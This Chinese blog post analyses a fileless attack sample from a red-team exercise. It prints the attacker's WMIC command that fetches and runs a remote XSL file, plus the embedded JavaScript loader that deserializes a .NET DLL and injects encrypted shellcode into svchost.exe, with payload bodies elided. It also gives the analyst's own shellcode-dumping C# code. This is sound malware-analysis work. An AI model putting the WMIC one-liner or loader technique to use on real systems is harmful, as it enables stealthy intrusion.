2021攻防参考 | 一次红蓝对抗无文件攻击溯源

admin 2021年4月18日08:00:50评论56 views字数 3715阅读12分23秒阅读模式
无文件(Fileless)和不落地(Living off the Land)攻击已经非常流行,特别是在一些高等级的攻击实战中会出现。
理想的无文件攻击是只存在于内存中的后门,攻击人员会找一些长期开机的基础设施。
powershell字符串解析下载、mahta、rundll32、.NET assembly托管代码注入
文章作者:FFE4
原文地址:https://blog.csdn.net/cssxn/article/details/88956732

0x01 简述

前段时间参加公司举办的红蓝对抗演习,帮助蓝军分析并溯源样本。拿到样本时,就一个xsl类型的文件,和一个用来执行该样本的命令行,如下所示:
C:/Windows/SysWOW64/wbem/WMIC.exe os get /format:"//ip/scripts/1.xsl"

可以看出,是通过白利用技术,通过wmic来执行的这个恶意的xsl文件,想了解更多,可以参考这篇文章
https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8wmic%E8%B0%83%E7%94%A8xsl%E6%96%87%E4%BB%B6%E7%9A%84%E5%88%86%E6%9E%90%E4%B8%8E%E5%88%A9%E7%94%A8/

0x02 xsl文件分析

XSL文件是一种可扩展样式语言,可以通过内置标签来解析执行其他脚本语言,如:Javascript,VBscript等。
https://zh.wikipedia.org/wiki/%E5%8F%AF%E6%89%A9%E5%B1%95%E6%A0%B7%E5%BC%8F%E8%AF%AD%E8%A8%80

通过分析发现,该xsl中内嵌的远不止JS脚本这么简单!内嵌的js脚本会修改当前进程的shell环境为.net的环境,然后通过解密base64硬编码的PE文件,该文件是由C#编写的DLL文件。

然后以.NET的shell环境来调用.net的函数,并把硬编码的dll文件字节码反序列化成C#类对象,调用该类对象中的名为:call的函数,通过js调用.net函数,参考:
https://github.com/tyranid/DotNetToJScript

修改Shell环境为.NET:
function autoversion(){var shell = new ActiveXObject('WScript.Shell'); ver = 'v4.0.30319';try { shell.RegRead('HKLM\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\'); } catch(e) { ver = 'v2.0.50727'; } shell.Environment('Process')('COMPLUS_Version') = ver; }

调用.net类对象的call函数,可以看到call函数传入一个系统进程名字,svchost.exe,另一个是base64硬编码的一段加密的code

run函数:
function run(){ var serialized_obj = 'base64硬编码的C# DLL文件'; var cryptedcode = 'Base64加密的shellcode'; var entry_class = 'test'; try { autoversion(); var stm = base64ToStream(serialized_obj); var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter'); var al = new ActiveXObject('System.Collections.ArrayList'); var d = fmt.Deserialize_2(stm); al.Add(fmt.SurrogateSelector); var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class); o.call('svchost.exe', cryptedcode); } catch (e) { } return 0;    }

serialized_obj变量中保存的是base64硬编码的dll文件,首先通过Chrome浏览器自带的调试器,还原出完整的base64加密字符串,点击右下角的copy
2021攻防参考 | 一次红蓝对抗无文件攻击溯源

然后使用010Editor自带的base64decode脚本解密该密文
2021攻防参考 | 一次红蓝对抗无文件攻击溯源

解密base64后,切换个hex模式,往下拉动滚动条,可以看到文件的MZ头,删除前面的垃圾内容,保留从MZ头到末尾即可还原出DLL文件
2021攻防参考 | 一次红蓝对抗无文件攻击溯源

可以看到是.net2.0库写的dll
2021攻防参考 | 一次红蓝对抗无文件攻击溯源

0x03 C# DLL文件分析

使用ILSpy工具反编译刚才dump出来的C# DLL文件,可以看到内部有个test类,类中果然有个call的方法
2021攻防参考 | 一次红蓝对抗无文件攻击溯源

call(svchost,base64密文),Call方法中调用 DESEncrypt.Decrypt(b64code, test.key);方法,解密base64密文,然后使用硬编码的DES KEY:***ATeam 解密shellcode
2021攻防参考 | 一次红蓝对抗无文件攻击溯源

最后调用CodeLoader.CreateProcessWithCode(path, code); 通过分析CreateProcessWithCode函数,发现是通过创建傀儡进程的方式注入shellcode并运行的,了解更多,请参考
https://www.4hou.com/technology/8869.html
2021攻防参考 | 一次红蓝对抗无文件攻击溯源

0x04 shellcode分析

通过上面的分析,可以写一个C#程序,把注入到进程中的shellcode dump出来
using System;using System.Collections.Generic;using System.IO;using System.Linq;using System.Security.Cryptography;using System.Text;using System.Threading.Tasks; namespace test{ class Program { static string key = "xxx"; static string cryptedcode = "base64->des加密的shellcode"; public static byte[] Decrypt(string pToDecrypt, string sKey) { DESCryptoServiceProvider dESCryptoServiceProvider = new DESCryptoServiceProvider(); byte[] array = Convert.FromBase64String(pToDecrypt); dESCryptoServiceProvider.Key = Encoding.ASCII.GetBytes(sKey); dESCryptoServiceProvider.IV = Encoding.ASCII.GetBytes(sKey); MemoryStream memoryStream = new MemoryStream(); CryptoStream cryptoStream = new CryptoStream(memoryStream, dESCryptoServiceProvider.CreateDecryptor(), CryptoStreamMode.Write); cryptoStream.Write(array, 0, array.Length); cryptoStream.FlushFinalBlock(); return memoryStream.ToArray(); } static void Main(string[] args) { byte[] code = Decrypt(cryptedcode, key); string filePath = Directory.GetCurrentDirectory() + "\123.txt"; if (File.Exists(filePath)) File.Delete(filePath); FileStream fs = new FileStream(filePath, FileMode.Create); fs.Write(code, 0, code.Length); fs.Flush(); fs.Close(); int n = 123; } }}

分析shellcode后,发现是个loader程序,对应的C2地址,由于这边IP访问限制,访问不了总部那边的网络
2021攻防参考 | 一次红蓝对抗无文件攻击溯源

免责声明

郑重声明:本号所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途,否则后果自行承担!

2021攻防参考 | 一次红蓝对抗无文件攻击溯源


一如既往的学习,一如既往的整理,一如即往的分享。感谢支持2021攻防参考 | 一次红蓝对抗无文件攻击溯源

“如侵权请私聊公众号删文”



扫描关注LemonSec

2021攻防参考 | 一次红蓝对抗无文件攻击溯源

觉得不错点个“赞”、“在看”哦

本文始发于微信公众号(LemonSec):2021攻防参考 | 一次红蓝对抗无文件攻击溯源

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月18日08:00:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   2021攻防参考 | 一次红蓝对抗无文件攻击溯源https://cn-sec.com/archives/337478.html

发表评论

匿名网友 填写信息